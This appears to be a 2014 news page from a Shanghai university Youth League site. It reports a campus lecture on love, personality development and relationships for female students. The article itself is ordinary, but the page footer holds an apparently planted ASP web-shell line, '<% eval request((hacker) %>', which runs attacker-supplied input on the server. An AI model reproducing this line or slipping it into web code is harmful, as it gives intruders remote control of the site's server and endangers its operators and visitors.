当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
海洋科学学院举办女大学生情感教育讲座
[2014年04月02日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    2014年3月30日晚,海洋科学学院全体13级女生参加了“女大学生情感教育”讲座,讲座由学院心理辅导老师黄永莲副教授主讲。

    讲座开始,黄永莲做了一个小小的调查,让在座的女生目前有男朋友的举手,结果没有人举手。然后请在座女生中,寝室室友或同班同学有男朋友的举手,举手的为数不少。这样的调查让大家都笑了。

     诸如爱情与友情、爱情与金钱、爱情与婚姻、爱情与性等关于爱情的话题有许多,黄永莲表示本次讲座侧重于爱情与人格发展理论。她首先介绍了佛洛伊德人格发展理论,强调了每一个阶段对人格塑造产生的重要性。其后介绍了艾里克森的人格发展理论,并依据理论强调大学生只有在解决好自我同一性问题之后,才可以步入下一个阶段,即爱的阶段。她说,因为只有具有牢固的自我同一性的青年人,才敢于冒着与他人发生亲密关系的风险;因为与他人发生爱的关系,就是把自己的同一性与他人的同一性融合一体。黄永莲还介绍了斯腾伯格的爱情三角理论,爱情是由亲密(重视彼此的喜欢、理解与期待)、激情(魅力与性吸引)以及承诺(决定发展稳定的关系)三个因素组成的三角形。

   随后,黄永莲和学生一起讨论了如何走出单相思的误区,如何面对失恋,如何对待恋爱中的身体接触及性行为,并和大家一起分享了苏格拉底与失恋者的对话。讲座中,黄永莲通过案例分析,让同学们明白恋爱应该是建立在双方充分了解基础之上的;恋爱不能轻率,不能盲从;我们只有自己足够成熟时才会对一段感情负责,否则容易伤人伤己。

   通过这次讲座,同学们明白了人格发展对于人际交往的重要性,并对大学生情感有了更清晰明确认识。                    

 

关闭窗口

上一篇:后勤服务中心结合教育实践“回头看”推进2014党务工作

下一篇:食品学院举行师生篮球友谊赛
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>